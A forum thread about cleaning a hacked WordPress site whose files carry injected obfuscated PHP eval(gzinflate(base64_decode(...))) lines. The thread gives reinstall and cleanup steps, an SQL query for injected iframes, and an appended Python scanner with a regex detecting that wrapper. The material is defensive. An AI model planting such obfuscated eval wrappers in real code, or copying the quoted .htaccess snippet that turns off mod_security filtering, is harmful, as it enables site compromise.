Status
Not open for further replies.

iRob

I'm having a problem in WP. I don't know how it came, or if someone injected the code. It looks like this:
Code:
<?php eval(gzinflate(base64_decode('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')));?>

I found this code in many files of my WP, like index.php, wp-config.php, wp-setting.php, in my theme's header, footer, function.php & in other places.
Because of this my site is not functioning well & I can't access my WP dashboard.
Before I can use my dashboard I have to delete that code. But this code keeps re-appearing again & again.

Can anyone help me with what I should do?
 
25 comments
Yup restored the code
Code:
eval(base64_decode('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'));?>

Site working now.
 
Okay iRob, that's good to know. Now, what we're going to do here is try to clean your WordPress blog from the hacking.
Make sure you follow each of the steps below precisely and try to remain calm the whole time.

1. Back up the site and the database.
Yes, do it again, completely everything, don't forget the database (MySQL)!

2. Make a copy of any uploaded files, such as images, that are referenced.
Go to your uploads folder on cPanel or FTP and download everything that you might need, theme files, images and such.

3. Download a fresh version of WP, all of the plugins you need, and a clean template.
A tedious task perhaps, if you are not familiar with the whole process (which I believe you are), it can be made easier if you use EasyWP WordPress Installer, a script which installs a fresh copy of your WordPress in under a few minutes.
Simply download and unzip EasyWP.zip (download link on this page). Upload easywp.php (a single file that is a mere 8KB) to the folder where you want to install your blog. Any directory will do, including the root directory, as long as WordPress isn’t already installed in it (this script is designed to do clean installs only) and PHP can write to that directory (either through setting the permissions, or through PHPSuExec running on your server). Next, visit the page wherever you uploaded it to
Code:
http://www.yourserver.com/blog/easywp.php
Fill out the form, and hit the “Go!” button.
EasyWP will download the latest version of WordPress, unzip it into the directory where you want to host your blog, and modify your configuration file based on the information you entered into the form. Then it tests your database connection. If that fails, it gives you a chance to re-edit the info you entered, so if you made a mistake there is no need to edit and re-upload the config file separately (just like when you install WordPress without the script, you do have to create the database and user beforehand). After that it takes you to the normal WordPress setup page, where you finish the process.

4. Delete all of the files and folders in the WP directory, either through FTP (slower) or through cPanel’s File Manager (faster).
Now that you have fresh copies of all the files you need, and copied all of your uploaded images, completely delete the entire directory structure your blog is in. This is the only surefire way to completely remove all possibly infected files. You can do this through FTP, but due to the way that FTP handles folder deletion (i.e. it walks the directory structure, stores each and every file name that needs to be deleted, and then sends a delete command for each one), this can be slow and in some instances cause you to get disconnected due to flooding the server with FTP commands. If available, it is much faster to do this through either cPanel’s File Manager, or via command line if you happen to have shell access.

5. Re-upload the new fresh copies you just grabbed.
This step should be self-explanatory, but I would like to mention that if your FTP client supports it (I use FileZilla, which does) and your host allows it, then increasing the number of simultaneous connections you use to upload can greatly reduce your overall transfer time, especially on servers or ISPs where latency is more of an issue than bandwidth. In FileZilla this setting is found by going to “Edit -> Settings -> File transfer settings”.

6. Run the database upgrade (point your browser at /wp-admin/upgrade.php).
This will make any necessary changes to your database structure to support the newest version of WordPress.

7. Immediately change your admin password.
If you have more than one admin (meaning any user with editing capabilities), and cannot get the others to change their passwords right then, I would change their user levels until they can change their passwords as well. If there is anyone in your user list that has editing capabilities, and you do not recognize them, it’s probably best to just delete them altogether.

8. Go through the posts and repair any damage in the posts themselves.
If this has happened, you will want to delete any links or iframes that were inserted, and restore any lost content. Google and Yahoo’s caches are often a good source of what used to be there if anything got overwritten. The following query run against the database can help you isolate which posts you want to look at:
Code:
 SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%' UNION SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'
If you did not change the default prefix for WordPress tables, then you can copy and paste that directly into a query window and run it, and it should pull up any posts that have been modified to hide content using any of the methods I have come across so far (iframes, noscript tags, and display:none style attributes). To get to a query window in cPanel, you would click on the MySQL® Databases icon, scroll to the bottom of the page, and then click on phpMyAdmin. Once the new window or tab opens, you would click on the database in the left-hand side that your blog was in, and then in the right side at the top click on the SQL tab. Then just paste the query into the large text area and hit the Go button.
Note, however, that there may be other types of injected content that I haven’t seen yet, and that a manual inspection looking for the types of patterns that first alerted you to the fact that your blog was hacked is always a good idea.


9. Edit your wp-config.php
Change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
Code:
 define('SECRET_KEY', '1234567890');

10. Check your .htaccess file in the root of your blog.
If you've never edited it, it should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPress
That file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule>
To sum it up, what you need to do is:

  1. Back up the whole WordPress database (using the Export tool and via an SQL dump/cPanel)
  2. Back up the whole WordPress directory for analysis and remove it from the site
  3. Re-Upload latest WordPress files which you downloaded.
  4. Upgrade your WordPress (if Available)
  5. Do a final password change.
Good luck, if you need further assistance please reply.
 
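An added example (not part of the post above or of the thread): a small Python scanner to run over the downloaded backup and the copy of the uploads folder before anything is re-uploaded. It flags files containing the `eval(gzinflate(base64_decode(` style wrapper shown in the first post, and any PHP file sitting under an `uploads` directory; the function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# eval( wrapped around one or more decode/decompress calls, as in the posted sample
OBFUSCATED_EVAL = re.compile(
    rb"eval\s*\(\s*(?:(?:gzinflate|gzuncompress|str_rot13|base64_decode)\s*\(\s*)+",
    re.IGNORECASE,
)
PHP_EXTENSIONS = (".php", ".phtml", ".inc")  # assumed list of script extensions


def scan_tree(root):
    """Return sorted (relative_path, reason) findings for a backup directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            if OBFUSCATED_EVAL.search(data):
                findings.append((rel, "obfuscated eval"))
            elif name.lower().endswith(PHP_EXTENSIONS) and "/uploads/" in "/" + rel:
                # uploads should hold media only, so any script there needs review
                findings.append((rel, "PHP file in uploads"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample files; PAYLOAD stands in for the real base64 blob."""
    samples = {
        "index.php": "<?php eval(gzinflate(base64_decode('PAYLOAD')));?>\n",
        "wp-config.php": "<?php define('DB_NAME', 'wp');",
        "wp-content/uploads/2012/03/logo.png": "not really a png",
        "wp-content/uploads/2012/03/cache.php": "<?php echo 1;",
        "wp-content/themes/x/footer.php": "<?php EVAL ( base64_decode('PAYLOAD'));",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in scan_tree(tmp):
            print(f"{reason:22} {rel}")
```

Point `scan_tree()` at the local backup path. An empty result only means this one wrapper style was not found, so the manual inspection the post recommends still applies.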
Thanks Raptile for your nice support & superb instruction. I will definitely do these steps as soon as I have enough time.
Thanks again
 
No problem iRob, please do report back with the results. If you come to a solution, know that you will need further protection too, which I will instruct you on once you clean your WordPress website.
Good luck once again.
 
OK, I've tried everything to tackle the problem without reinstalling WP, but all went in vain & the problem still exists. So I've decided to reinstall everything with a new one & want my posts to be safe & able to be restored too.
So can anyone instruct me in a bit of detail how I can do it safely?
Do I only need to back up MySQL?
Am I supposed to delete the entire home directory or just delete the files within public_html?

Thanks
Regards
 